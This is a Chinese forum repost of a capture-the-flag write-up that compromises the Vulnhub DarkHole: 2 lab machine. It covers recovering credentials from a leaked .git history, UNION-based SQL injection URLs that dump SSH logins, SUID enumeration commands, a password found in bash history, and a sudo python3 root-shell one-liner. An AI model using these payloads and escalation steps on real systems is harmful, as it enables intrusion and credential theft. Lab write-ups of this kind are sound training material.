• 售前

  • 售后

热门帖子
入门百科

Vulnhub之DARKHOLE: 2渗透测试

[复制链接]
半岛宫殿rw 显示全部楼层 发表于 2022-1-13 08:25:44 |阅读模式 打印 上一主题 下一主题
目录



1、靶机概述

Description
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
kali:192.168.110.128
靶机:192.168.110.137
2、信息搜集

首先探测靶机IP地址

扫一下端口和服务,可知靶机只开启了22和80端口。

我们访问一下站点,页面存在登陆接口Login。

点击login,跳转至登陆页面

没有注册接口,靶机也已经提示不要浪费时间在爆破上面
右键查看一下页面源码吧

没有找到有用的信息。
接下来,扫描一下后台目录

发现存在git泄漏,并访问.git目录

分析源码

获取源码:
  1. wget -r //递归下载所有文件
  2. wget -r http://192.168.110.137/.git
复制代码
这将创建一个名称为 IP 地址的目录。在目录中,它包含递归下载的文件,包括“.git”。

按如下方式克隆
  1. git clone . testweb
复制代码
这将创建一个 git 存储库“testweb”,我们可以在其中执行所有 git 操作。

进入config目录查看配置

可知数据库名为darkhole_2
继续查看login.php

可以看到做了防sql注入。
然后git log查看更新

看到第2次更新时,login.php使用了默认凭证。
因此,我们将 HEAD 切换到该提交,并查看login.php

找到了用户名和密码,然后登陆平台

找了一遍,不存在上传文件的地方。
不过,将id换成2,访问返回空

直觉告诉我,此处,应该存在sql注入
加上单引号'访问

然后http://192.168.110.137/dashboard.php?id=1%27--+访问正常

3、漏洞利用

order by 猜解表中列数

爆表名
  1. http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database() --+
复制代码

爆字段
因为要进入后台,我们选择爆ssh表字段。
  1. http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='ssh' --+
复制代码

爆数据
  1. http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(user,0x3a,pass) from ssh  --+
复制代码

ssh登录jehad用户

4、获取losy用户shell

如果想提权到root权限,linux系统通常有以下几种方法:

  • sudo提权,sudo -l 查询具有sudo权限命令,然后提权
  • SUID提权,查找具有root权限的SUID的文件
  1. find / -user root -perm -4000 -print 2>/dev/null
  2. find / -perm -u=s -type f 2>/dev/null
  3. find / -user root -perm -4000 -exec ls -ldb {} \;
复制代码

  • 通过在/etc/passwd添加一个root权限的账户进行提权
  1. find / -writable -type f 2>/dev/null
复制代码

  • 内核提权
尝试sudo和SUID提权,均失败

看一下历史命令cat .bash_history

发现可疑命令

执行后,发现是losy用户权限
kali上编写反弹shell,并起http服务

靶机上,将shell文件,下载到tmp文件夹下



5、提权到root

sudo -l提示需要输入密码,而我们现在还不知道losy用户密码

继续查看历史命令

发现losy用户密码为gang
ssh登录losy

sudo -l 查询发现可以使用python3提权

  1. sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"
复制代码


来源:https://blog.caogenba.net/guo15890025019/article/details/122434372
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作